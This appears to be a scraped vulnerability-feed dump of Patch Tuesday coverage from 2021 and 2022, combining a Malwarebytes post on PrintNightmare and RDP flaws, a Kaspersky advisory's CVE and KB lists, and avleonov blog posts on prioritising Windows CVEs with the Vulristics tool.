[Reportedly](<https://blog.automox.com/automox-experts-weigh-in-august-patch-tuesday-2021>), the exploit is low complexity and requires no user interaction, making this an easy vulnerability to include in an adversary's toolbox. The bug is only locally exploitable, but local elevation of privilege is exactly what ransomware gangs will be looking to do after breaching a network, for example.\n\n### 9.9 out of 10\n\n[CVE-2021-34535](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-34535>) is a [Remote Code Execution (RCE)](<https://blog.malwarebytes.com/glossary/remote-code-execution-rce-attack/>) vulnerability in Windows TCP/IP. This is remotely exploitable by a malicious Hyper-V guest sending an IPv6 ping to the Hyper-V host. An attacker could send a specially crafted TCP/IP packet to its host. This vulnerability exists in the TCP/IP protocol stack identified in Windows 7 and newer Microsoft operating systems, including servers.\n\nThis vulnerability received a CVSS score of 9.9 out of 10. The CVSS standards are used to help security researchers, software users, and vulnerability tracking organizations measure and report on the severity of vulnerabilities. CVSS can also help security teams and developers prioritize threats and allocate resources effectively.\n\n### 9.8 out of 10\n\nAnother high scorer is [CVE-2021-26432](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-26432>), an RCE in the Windows Services for NFS ONCRPC XDR Driver. Open Network Computing (ONC) Remote Procedure Call (RPC) is a remote procedure call system. ONC was originally developed by Sun Microsystems. The NFS protocol is independent of the type of operating system, network architecture, and transport protocols. The Windows service for the driver makes sure that Windows computers can use this protocol. 
This vulnerability got a high score because it is known to be easy to exploit and can be initiated remotely.\n\n### More RDP\n\n[CVE-2021-34535](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-34535>) is an RCE in the Remote Desktop Client. Microsoft lists two exploit scenarios for this vulnerability:\n\n * In the case of a Remote Desktop connection, an attacker with control of a Remote Desktop Server could trigger a remote code execution (RCE) on the machine when a victim connects to the attacking server with the vulnerable Remote Desktop Client.\n * In the case of Hyper-V, a malicious program running in a guest VM could trigger guest-to-host RCE by exploiting this vulnerability in the Hyper-V Viewer when a victim running on the host connects to the attacking Hyper-V guest.\n\nSince this is a client-side vulnerability, an attacker would have to convince a user to authenticate to a malicious RDP server, where the server could then trigger the bug on the client side. Combined with other RDP weaknesses, however, this vulnerability would be easy to chain into a full system take-over.\n\n### Never-ending nightmare of PrintNightmare\n\nThe Print Spooler service was subject to yet more patching. The researchers behind PrintNightmare predicted that it would be a fertile ground for further discoveries, and they seem to be right. I\u2019d be tempted to advise Microsoft to start from scratch instead of patching patches on a very old chunk of code.\n\n[CVE-2021-36936](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-36936>) is an RCE vulnerability in Windows Print Spooler. 
A vulnerability that was publicly disclosed, which may be related to several bugs in Print Spooler that were identified by researchers over the past few months (presumably PrintNightmare).\n\n[CVE-2021-34481](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-34481>) and [CVE-2021-34527](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-34527>) are RCE vulnerabilities that could allow attackers to run arbitrary code with SYSTEM privileges.\n\nMicrosoft said the Print Spooler patch it pushed this time should address all publicly documented security problems with the service. In an unusual step, it has made a breaking change: \u201cToday we are addressing this risk by changing the default Point and Print driver installation and update behavior to require administrator privileges.\u201d\n\nTo be continued, we suspect.\n\nThe post [PrintNightmare and RDP RCE among major issues tackled by Patch Tuesday](<https://blog.malwarebytes.com/exploits-and-vulnerabilities/2021/08/printnightmare-and-rdp-rce-among-major-issues-tackled-by-patch-tuesday/>) appeared first on [Malwarebytes Labs](<https://blog.malwarebytes.com>).", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "LOW", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-08-11T12:16:17", "type": "malwarebytes", "title": "PrintNightmare and RDP RCE among major issues tackled by Patch Tuesday", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", 
\n[CVE-2022-22049](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-22049>) \n[CVE-2022-30223](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-30223>) \n[CVE-2022-22026](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-22026>) \n[CVE-2022-30209](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-30209>) \n[CVE-2022-22711](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-22711>) \n[CVE-2022-22040](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-22040>) \n[CVE-2022-22050](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-22050>) \n[CVE-2022-22025](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-22025>) \n[CVE-2022-22043](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-22043>) \n[CVE-2022-30224](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-30224>) \n[CVE-2022-22024](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-22024>) \n[CVE-2022-22034](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-22034>) \n[CVE-2022-30226](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-30226>) \n[CVE-2022-22041](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-22041>) \n[CVE-2022-22022](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-22022>) \n[CVE-2022-30208](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-30208>) \n[CVE-2022-30215](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-30215>) \n[CVE-2022-22045](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-22045>) \n[CVE-2022-30213](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-30213>) \n[CVE-2022-22027](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-22027>) \n[CVE-2022-22029](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-22029>) 
\n[CVE-2022-29900](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-29900>) \n[CVE-2022-23825](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-23825>) \n[CVE-2022-27776](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-27776>) \n\n\n### *Impacts*:\nACE \n\n### *Related products*:\n[Microsoft Windows](<https://threats.kaspersky.com/en/product/Microsoft-Windows/>)\n\n### *CVE-IDS*:\n[CVE-2022-30206](<https://vulners.com/cve/CVE-2022-30206>)7.2High \n[CVE-2022-30222](<https://vulners.com/cve/CVE-2022-30222>)4.6Warning \n[CVE-2022-30203](<https://vulners.com/cve/CVE-2022-30203>)4.6Warning \n[CVE-2022-23825](<https://vulners.com/cve/CVE-2022-23825>)2.1Warning \n[CVE-2022-22023](<https://vulners.com/cve/CVE-2022-22023>)6.9High \n[CVE-2022-30221](<https://vulners.com/cve/CVE-2022-30221>)5.1High \n[CVE-2022-30211](<https://vulners.com/cve/CVE-2022-30211>)6.0High \n[CVE-2022-30214](<https://vulners.com/cve/CVE-2022-30214>)6.0High \n[CVE-2022-30212](<https://vulners.com/cve/CVE-2022-30212>)4.7Warning \n[CVE-2022-30202](<https://vulners.com/cve/CVE-2022-30202>)6.9High \n[CVE-2022-22037](<https://vulners.com/cve/CVE-2022-22037>)8.5Critical \n[CVE-2022-27776](<https://vulners.com/cve/CVE-2022-27776>)4.3Warning \n[CVE-2022-22031](<https://vulners.com/cve/CVE-2022-22031>)7.2High \n[CVE-2022-33644](<https://vulners.com/cve/CVE-2022-33644>)4.4Warning \n[CVE-2022-22048](<https://vulners.com/cve/CVE-2022-22048>)6.6High \n[CVE-2022-22036](<https://vulners.com/cve/CVE-2022-22036>)4.4Warning \n[CVE-2022-22028](<https://vulners.com/cve/CVE-2022-22028>)4.3Warning \n[CVE-2022-30205](<https://vulners.com/cve/CVE-2022-30205>)6.0High \n[CVE-2022-22047](<https://vulners.com/cve/CVE-2022-22047>)7.2High \n[CVE-2022-30225](<https://vulners.com/cve/CVE-2022-30225>)3.6Warning \n[CVE-2022-30216](<https://vulners.com/cve/CVE-2022-30216>)6.5High \n[CVE-2022-21845](<https://vulners.com/cve/CVE-2022-21845>)4.7Warning 
\n[CVE-2022-22042](<https://vulners.com/cve/CVE-2022-22042>)4.0Warning \n[CVE-2022-30220](<https://vulners.com/cve/CVE-2022-30220>)7.2High \n[CVE-2022-22039](<https://vulners.com/cve/CVE-2022-22039>)6.0High \n[CVE-2022-22038](<https://vulners.com/cve/CVE-2022-22038>)6.8High \n[CVE-2022-22049](<https://vulners.com/cve/CVE-2022-22049>)7.2High \n[CVE-2022-30223](<https://vulners.com/cve/CVE-2022-30223>)2.7Warning \n[CVE-2022-22026](<https://vulners.com/cve/CVE-2022-22026>)7.2High \n[CVE-2022-30209](<https://vulners.com/cve/CVE-2022-30209>)5.8High \n[CVE-2022-22711](<https://vulners.com/cve/CVE-2022-22711>)3.3Warning \n[CVE-2022-22040](<https://vulners.com/cve/CVE-2022-22040>)7.5Critical \n[CVE-2022-22050](<https://vulners.com/cve/CVE-2022-22050>)7.2High \n[CVE-2022-22025](<https://vulners.com/cve/CVE-2022-22025>)5.0Critical \n[CVE-2022-22043](<https://vulners.com/cve/CVE-2022-22043>)7.2High \n[CVE-2022-30224](<https://vulners.com/cve/CVE-2022-30224>)6.9High \n[CVE-2022-22024](<https://vulners.com/cve/CVE-2022-22024>)5.1High \n[CVE-2022-22034](<https://vulners.com/cve/CVE-2022-22034>)7.2High \n[CVE-2022-30226](<https://vulners.com/cve/CVE-2022-30226>)3.6Warning \n[CVE-2022-22041](<https://vulners.com/cve/CVE-2022-22041>)8.5Critical \n[CVE-2022-22022](<https://vulners.com/cve/CVE-2022-22022>)3.6Warning \n[CVE-2022-30208](<https://vulners.com/cve/CVE-2022-30208>)4.0Warning \n[CVE-2022-30215](<https://vulners.com/cve/CVE-2022-30215>)8.5Critical \n[CVE-2022-22045](<https://vulners.com/cve/CVE-2022-22045>)6.9High \n[CVE-2022-30213](<https://vulners.com/cve/CVE-2022-30213>)2.1Warning \n[CVE-2022-22027](<https://vulners.com/cve/CVE-2022-22027>)6.8High \n[CVE-2022-22029](<https://vulners.com/cve/CVE-2022-22029>)6.8High \n[CVE-2022-29900](<https://vulners.com/cve/CVE-2022-29900>)2.1Warning\n\n### *KB list*:\n[5015808](<http://support.microsoft.com/kb/5015808>) \n[5015875](<http://support.microsoft.com/kb/5015875>) \n[5015811](<http://support.microsoft.com/kb/5015811>) 
\n[5015863](<http://support.microsoft.com/kb/5015863>) \n[5015877](<http://support.microsoft.com/kb/5015877>) \n[5015807](<http://support.microsoft.com/kb/5015807>) \n[5015832](<http://support.microsoft.com/kb/5015832>) \n[5015874](<http://support.microsoft.com/kb/5015874>) \n[5015814](<http://support.microsoft.com/kb/5015814>) \n[5015827](<http://support.microsoft.com/kb/5015827>) \n[5023752](<http://support.microsoft.com/kb/5023752>) \n[5023764](<http://support.microsoft.com/kb/5023764>) \n[5023756](<http://support.microsoft.com/kb/5023756>) \n[5023713](<http://support.microsoft.com/kb/5023713>) \n[5023765](<http://support.microsoft.com/kb/5023765>) \n[5023698](<http://support.microsoft.com/kb/5023698>) \n[5023702](<http://support.microsoft.com/kb/5023702>) \n[5023696](<http://support.microsoft.com/kb/5023696>) \n[5023697](<http://support.microsoft.com/kb/5023697>)\n\n### *Microsoft official advisories*:", "cvss3": {"exploitabilityScore": 2.0, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-07-12T00:00:00", "type": "kaspersky", "title": "KLA12580 Multiple vulnerabilities in Microsoft Windows", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 6.8, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 8.5, "vectorString": "AV:N/AC:M/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, 
"cvelist": ["CVE-2022-21845", "CVE-2022-22022", "CVE-2022-22023", "CVE-2022-22024", "CVE-2022-22025", "CVE-2022-22026", "CVE-2022-22027", "CVE-2022-22028", "CVE-2022-22029", "CVE-2022-22031", "CVE-2022-22034", "CVE-2022-22036", "CVE-2022-22037", "CVE-2022-22038", "CVE-2022-22039", "CVE-2022-22040", "CVE-2022-22041", "CVE-2022-22042", "CVE-2022-22043", "CVE-2022-22045", "CVE-2022-22047", "CVE-2022-22048", "CVE-2022-22049", "CVE-2022-22050", "CVE-2022-22711", "CVE-2022-23825", "CVE-2022-27776", "CVE-2022-29900", "CVE-2022-30202", "CVE-2022-30203", "CVE-2022-30205", "CVE-2022-30206", "CVE-2022-30208", "CVE-2022-30209", "CVE-2022-30211", "CVE-2022-30212", "CVE-2022-30213", "CVE-2022-30214", "CVE-2022-30215", "CVE-2022-30216", "CVE-2022-30220", "CVE-2022-30221", "CVE-2022-30222", "CVE-2022-30223", "CVE-2022-30224", "CVE-2022-30225", "CVE-2022-30226", "CVE-2022-33644"], "modified": "2023-05-19T00:00:00", "id": "KLA12580", "href": "https://threats.kaspersky.com/en/vulnerability/KLA12580/", "cvss": {"score": 8.5, "vector": "AV:N/AC:M/Au:S/C:C/I:C/A:C"}}], "avleonov": [{"lastseen": "2022-08-14T11:59:47", "description": "Hello everyone! Microsoft has been acting weird lately. I mean the recent [publication of a propaganda report](<https://t.me/avleonovcom/1021>) about evil Russians and how Microsoft is involved in the conflict between countries. It wouldn't be unusual for a US government agency, NSA or CIA to publish such a report. But when a global IT vendor, which, in theory, should be more or less neutral, does this\u2026 This is a clear signal. It's not about business anymore. \n\nAlternative video link (for Russia): <https://vk.com/video-149273431_456239096>\n\nI'll take a closer look at this report in the next episode of the Vulnerability Management news, but for now let's take a look at Microsoft July Patch Tuesday. Yes, the vendor is behaving strangely, but Microsoft products need to be patched. Right? At least for now. 
And tracking vulnerabilities is always a good thing. \n\nOn July Patch Tuesday, July 12, 84 vulnerabilities were released. Between June and July Patch Tuesdays, 15 vulnerabilities were released. This gives us 99 vulnerabilities in the report. \n \n \n $ cat comments_links.txt \n Qualys|July 2022 Patch Tuesday. Microsoft Releases 84 Vulnerabilities with 4 Critical, plus 2 Microsoft Edge (Chromium-Based); Adobe Releases 4 Advisories, 27 Vulnerabilities with 18 Critical.|https://blog.qualys.com/vulnerabilities-threat-research/2022/07/12/july-2022-patch-tuesday\n ZDI|The July 2022 Security Update Review|https://www.zerodayinitiative.com/blog/2022/7/12/the-july-2022-security-update-review\n \n $ python3.8 vulristics.py --report-type \"ms_patch_tuesday_extended\" --mspt-year 2022 --mspt-month \"July\" --mspt-comments-links-path \"comments_links.txt\" --rewrite-flag \"True\"\n ...\n Creating Patch Tuesday profile...\n MS PT Year: 2022\n MS PT Month: July\n MS PT Date: 2022-07-12\n MS PT CVEs found: 84\n Ext MS PT Date from: 2022-06-15\n Ext MS PT Date to: 2022-07-11\n Ext MS PT CVEs found: 15\n ALL MS PT CVEs: 99\n ...\n\n * Urgent: 0\n * Critical: 1\n * High: 19\n * Medium: 78\n * Low: 1\n\nInterestingly, in this Patch Tuesday, more than half of all vulnerabilities are EoP.\n\n## CSRSS EoP\n\nWhat can I say, prioritization in [Vulristics](<https://github.com/leonov-av/vulristics>) works correctly. At the top of the July Patch Tuesday list is one critical and actively exploited **Elevation of Privilege** in Windows CSRSS (CVE-2022-22047). This vulnerability has been widely reported in the media.\n\nClient Server Runtime Subsystem, or csrss.exe, is a component of the Windows NT family of operating systems that provides the user mode side of the Win32 subsystem and is included in Windows NT 3.1 and later. 
Because most of the Win32 subsystem operations have been moved to kernel mode drivers in Windows NT 4 and later, CSRSS is mainly responsible for Win32 console handling and GUI shutdown.\n\nCSRSS runs as a user-mode system service. When a user-mode process calls a function involving console windows, process/thread creation, or side-by-side support, instead of issuing a system call, the Win32 libraries (kernel32.dll, user32.dll, gdi32.dll) send an inter-process call to the CSRSS process which does most of the actual work without compromising the kernel.\n\nThis Elevation of Privilege vulnerability in CSRSS allows an attacker to execute code as SYSTEM, provided they can execute other code on the target. Bugs of this type are typically paired with a code execution bug, usually a specially crafted Office or Adobe document, to take over a system. These attacks often rely on macros, which is why so many were disheartened to hear Microsoft\u2019s delay in blocking all Office macros by default.\n\nMicrosoft says this vulnerability has been exploited in the wild, though no further details have been shared. There is no public exploit yet. Two similar vulnerabilities in CSRSS (CVE-2022-22049 and CVE-2022-22026) were also fixed, likely as a result of Microsoft\u2019s investigation into the in-the-wild exploitation of CVE-2022-22047.\n\n## RPC RCE\n\n**Remote Code Execution** in Remote Procedure Call Runtime (CVE-2022-22038). Here Microsoft has a POC exploit. This July Patch Tuesday bug could allow a remote, unauthenticated attacker to exploit code on an affected system. While not specified in the bulletin, the presumption is that the code execution would occur at elevated privileges. Combine these attributes and you end up with a potentially wormable bug. Microsoft states the attack complexity is high. 
Additional actions by an attacker are required in order to prepare a target for successful exploitation and an attacker would need to make \u201crepeated exploitation attempts\u201d to take advantage of this bug, but unless you are actively blocking RPC activity, you may not see these attempts.\n\n## Microsoft Edge Memory Corruption\n\nBetween June and July Patch Tuesday, **Memory Corruption** in Microsoft Edge (CVE-2022-2294) was released. Heap buffer overflow in WebRTC, to be precise. WebRTC (Web Real-Time Communication) is a free and open-source project providing web browsers and mobile applications with real-time communication (RTC) via application programming interfaces (APIs). It allows audio and video communication to work inside web pages by allowing direct peer-to-peer communication, eliminating the need to install plugins or download native apps. So, the vulnerability is in the Chromium Open Source Software (OSS) which is consumed by Microsoft Edge. Google is aware that an exploit for this vulnerability exists in the wild. If you\u2019re using Microsoft Edge (Chromium-based), make sure it gets updated as soon as possible.\n\n## Azure Site Recovery RCEs and EOPs\n\nThere are also a lot of vulnerabilities in Azure Site Recovery in July Patch Tuesday. Both EoPs and RCEs, and quite a few with non-public exploits of the POC maturity level. According to the description "Site Recovery is a native disaster recovery as a service (DRaaS)", it would seem that this should be patched by Microsoft themselves. But in fact, there is a Microsoft Azure Site Recovery suite installed on the hosts, and at least some of the vulnerabilities were found in it. \n\nLet's see, for example, **Elevation of Privilege** in Azure Site Recovery (CVE-2022-33675). The vulnerability was discovered and [reported to Microsoft by Tenable researcher Jimi Sebree](<https://www.tenable.com/security/research/tra-2022-26>). 
The Microsoft Azure Site Recovery suite contains a DLL hijacking flaw that allows for privilege escalation from any low privileged user to SYSTEM. \n\nIncorrect permissions on the service\u2019s executable directory (E:\\Program Files (x86)\\Microsoft Azure Site Recovery\\home\\svsystems\\transport\\\\) allow new files to be created by any user. The service launched from this directory runs automatically and with SYSTEM privileges and attempts to load several DLLs from this directory. This allows for a DLL hijacking/planting attack via several libraries that are attempted to be loaded from this location when the service is launched. Existing deployments should ensure that the Microsoft-supplied patches have been appropriately applied.\n\nThe full Vulristics report is available here: [ms_patch_tuesday_july2022_report](<https://avleonov.com/vulristics_reports/ms_patch_tuesday_july2022_report_with_comments_ext_img.html>)", "cvss3": {"exploitabilityScore": 2.0, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-07-23T08:34:29", "type": "avleonov", "title": "Microsoft Patch Tuesday July 2022: propaganda report, CSRSS EoP, RPC RCE, Edge, Azure Site Recovery", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, 
"acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22026", "CVE-2022-22038", "CVE-2022-22047", "CVE-2022-22049", "CVE-2022-2294", "CVE-2022-33675"], "modified": "2022-07-23T08:34:29", "id": "AVLEONOV:B87691B304EF70215B926F66B871260A", "href": "https://avleonov.com/2022/07/23/microsoft-patch-tuesday-july-2022-propaganda-report-csrss-eop-rpc-rce-edge-azure-site-recovery/", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-07-28T14:34:07", "description": "Hello everyone! Let's now talk about Microsoft Patch Tuesday vulnerabilities for the second quarter of 2021. April, May and June. Not the most exciting topic, I agree. I am surprised that someone is reading or watching this. For me personally, this is a kind of tradition. Plus this is an opportunity to try Vulristics in action and find possible problems. It is also interesting to see what VM vendors considered critical back then and what actually became critical. I will try to keep this video short.\n\nFirst of all, let's take a look at the vulnerabilities from the April Patch Tuesday. 108 vulnerabilities, 55 of them are RCEs. Half of these RCEs (27) are weird RPC vulnerabilities. "Researcher who reported these bugs certainly found quite the attack surface". The most critical vulnerability is RCE in Exchange (CVE-2021-28480). This is not ProxyLogon, this is another vulnerability. ProxyLogon was in March. And this vulnerability is simply related to ProxyLogon, so it is believed that it is exploited in the wild as well. In second place is this Win32k Elevation of Privilege (CVE-2021-28310). It is clearly mentioned in several sources as being used in real attacks. "Bugs of this nature are typically combined with other bugs, such as a browser bug or PDF exploit, to take over a system". And the only vulnerability with a public exploit is the Azure DevOps Server Spoofing (CVE-2021-28459). 
Previously known as Team Foundation Server (\u200bTFS), Azure DevOps Server is a set of collaborative software development tools. It is hosted on-premises. Therefore, this vulnerability can be useful for attackers.\n\nLet's take a look at May. A very small Patch Tuesday. There are only 55 vulnerabilities. Vendors mainly wrote about HTTP Protocol Stack Remote Code Execution Vulnerability. But no catastrophe happened. "tenable: On May 16, security researcher 0vercl0k published PoC code to github for CVE-2021-31166. Based on our analysis, this exploit could only result in a denial of service (DoS) condition". VM vendors also wrote a lot about Hyper-V Remote Code Execution Vulnerability. But there was no real exploitation there either. But a real exploit appeared for Remote Code Execution in Microsoft SharePoint (CVE-2021-31181). And exploitation in the wild was mentioned for Windows Container Manager Service (CVE-2021-31167), which no VM vendor mentioned at all. But the exploitation was "Personally observed in an environment", so this may not be accurate. Also take a look at Memory Corruption in Microsoft Scripting Engine (CVE-2021-26419) with a public exploit and Information Disclosure in Windows Wireless Networking (CVE-2020-24587) with a sign of exploitation in the wild (but this also may not be accurate).\n\nAnd finally June. There are even fewer vulnerabilities, only 49. But there are a lot of them with a sign of exploitation in the wild. And this information is directly from Microsoft. Windows MSHTML Platform Remote Code Execution (CVE-2021-33742). Elevations of Privilege in Windows NTFS (CVE-2021-31956), Microsoft Enhanced Cryptographic Provider (CVE-2021-31199, CVE-2021-31201), Microsoft DWM Core Library (CVE-2021-33739). Windows Kernel Information Disclosure (CVE-2021-31955). Much more than usual. VM vendors have written the most about EoP in Windows NTFS (CVE-2021-31956). Do you know what vulnerability they didn't highlight at all? 
Elevations of Privilege and later Remote Code Execution in Windows Print Spooler (CVE-2021-1675). The one that started the PrintNightmare story. Very ironic. Also pay attention to Spoofing in Microsoft SharePoint (CVE-2021-31950) for which there is a public Server-Side Request Forgery exploit. VM vendors also did not write anything about this vulnerability in their reviews.\n\nFull Vulristics reports:\n\n * [ms_patch_tuesday_april2021_report_avleonov_comments.html](<https://avleonov.com/vulristics_reports/ms_patch_tuesday_april2021_report_avleonov_comments.html>)\n * [ms_patch_tuesday_may2021_report_avleonov_comments.html](<https://avleonov.com/vulristics_reports/ms_patch_tuesday_may2021_report_avleonov_comments.html>)\n * [ms_patch_tuesday_june2021_report_avleonov_comments.html](<https://avleonov.com/vulristics_reports/ms_patch_tuesday_june2021_report_avleonov_comments.html>)\n\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-07-10T00:14:59", "type": "avleonov", "title": "Vulristics: Microsoft Patch Tuesdays Q2 2021", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-24587", 
"CVE-2021-1675", "CVE-2021-26419", "CVE-2021-28310", "CVE-2021-28459", "CVE-2021-28480", "CVE-2021-31166", "CVE-2021-31167", "CVE-2021-31181", "CVE-2021-31199", "CVE-2021-31201", "CVE-2021-31950", "CVE-2021-31955", "CVE-2021-31956", "CVE-2021-33739", "CVE-2021-33742"], "modified": "2021-07-10T00:14:59", "id": "AVLEONOV:9D3D76F4CC74C7ABB8000BC6AFB2A2CE", "href": "http://feedproxy.google.com/~r/avleonov/~3/zKo35MmSBcA/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-11-26T18:43:30", "description": "Hello everyone! Yet another news episode.\n\n## Microsoft's August Patch Tuesday\n\nLet's start with Microsoft's August Patch Tuesday. I think the most interesting thing is that it contains a fix for the PetitPotam vulnerability. I talked about this vulnerability two weeks ago. At the time, Microsoft had no plans to release a patch because PetitPotam was a "classic NTLM Relay Attack". But the patch was actually released as part of August Patch Tuesday.\n\nA [quote from Rapid7](<https://www.rapid7.com/blog/post/2021/08/03/petitpotam-novel-attack-chain-can-fully-compromise-windows-domains-running-ad-cs/>): _"Tracked as CVE-2021-36942, the August 2021 Patch Tuesday security update blocks the affected API calls OpenEncryptedFileRawA and OpenEncryptedFileRawW through the LSARPC interface"_. \n\nThere are no formal signs that this vulnerability is critical other than comments from the vendors. My Vulristics tool has flagged this "Windows LSA Spoofing" as a Medium level Vulnerability. But this fix seems to be the most important thing in this Patch Tuesday. So install this patch first.\n\nSpeaking of other vulnerabilities. There was nothing critical. No vulnerabilities with public exploits. Only one vulnerability that has been exploited in the wild, CVE-2021-36948 \u2013 Windows Update Medic Service Elevation of Privilege. 
But this is EoP and there are no public exploits yet, so I think you can patch it as planned without hurry.\n\nSeveral potentially dangerous RCEs:\n\n * Windows Print Spooler (CVE-2021-36936, CVE-2021-36947). They look similar to PrintNightmare, but there are no details yet.\n * Windows TCP/IP (CVE-2021-26424) and Remote Desktop Client (CVE-2021-34535). Such vulnerabilities rarely get public exploits.\n * NFS ONCRPC XDR Driver (CVE-2021-26432). Nothing is clear at all.\n\nIn general, it looks like a pretty calm Patch Tuesday. If you're interested, a link to the Vulristics report: [ms_patch_tuesday_august2021](<https://avleonov.com/vulristics_reports/ms_patch_tuesday_august2021_report_avleonov_comments.html>)\n\n## Phishers started using reCAPTCHA\n\nFunny news that I really liked. [Phishers started using reCAPTCHA](<https://threatpost.com/cyberattackers-captchas-phishing-malware/168684/>) to bypass the automatic detection of phishing sites. The script only sees the safe page with a CAPTCHA and can't solve it. But a real person just solves it without thinking, because people are used to seeing and solving such CAPTCHAs, and sees the complete phishing site. It's very simple and ingenious! \n\n## Scan one IP and go to prison\n\nAnd the last one is local news from Russia ([link](<https://www.rbc.ru/technology_and_media/17/08/2021/611a95059a7947e9bf954a8f>)). But the case is interesting. One guy worked in the tech support of some internet provider. And he decided to scan the network of this provider, detect misconfigured routers of the clients and inform them about the found vulnerabilities. His boss knew about it. Unfortunately, these clients included some government scientific research-to-production facility with a mail server available on the scanned IP. 
